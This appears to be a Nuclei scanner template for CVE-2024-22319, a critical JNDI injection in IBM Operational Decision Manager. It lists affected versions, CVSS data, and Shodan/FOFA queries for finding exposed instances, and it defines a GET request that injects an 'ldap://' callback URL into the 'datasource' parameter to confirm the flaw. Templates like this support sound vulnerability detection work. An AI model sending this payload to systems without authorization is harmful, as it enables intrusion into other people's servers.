id: CVE-2024-22319 info: name: IBM Operational Decision Manager - JNDI Injection author: DhiyaneshDK severity: critical description: | IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145. impact: | Unauthenticated attackers can execute arbitrary code via JNDI injection, potentially compromising the entire IBM ODM system. remediation: | Update IBM Operational Decision Manager to a version that addresses CVE-2024-22319. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-22319 cwe-id: CWE-74 epss-score: 0.86989 epss-percentile: 0.99452 cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: ibm product: operational_decision_manager shodan-query: - html:"IBM ODM" - http.html:"ibm odm" fofa-query: - title="IBM ODM" - title="ibm odm" - body="ibm odm" tags: cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce,vkev,vuln http: - method: GET path: - "{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}" matchers: - type: dsl dsl: - contains(interactsh_protocol, "dns") - 'contains(header, "application/json")' - 'contains(body, "patchLevel\":")' - 'status_code == 200' condition: and # digest: 490a0046304402207ee920393267506f3739833439c438578ef97558c7cd2e51dd4cda426b18ff3c0220185d8312a0376d83d07c0dfd153c33b08f5a07147ebd3ce1106c517459a26796:922c64590222798bb761d5b6d8e72950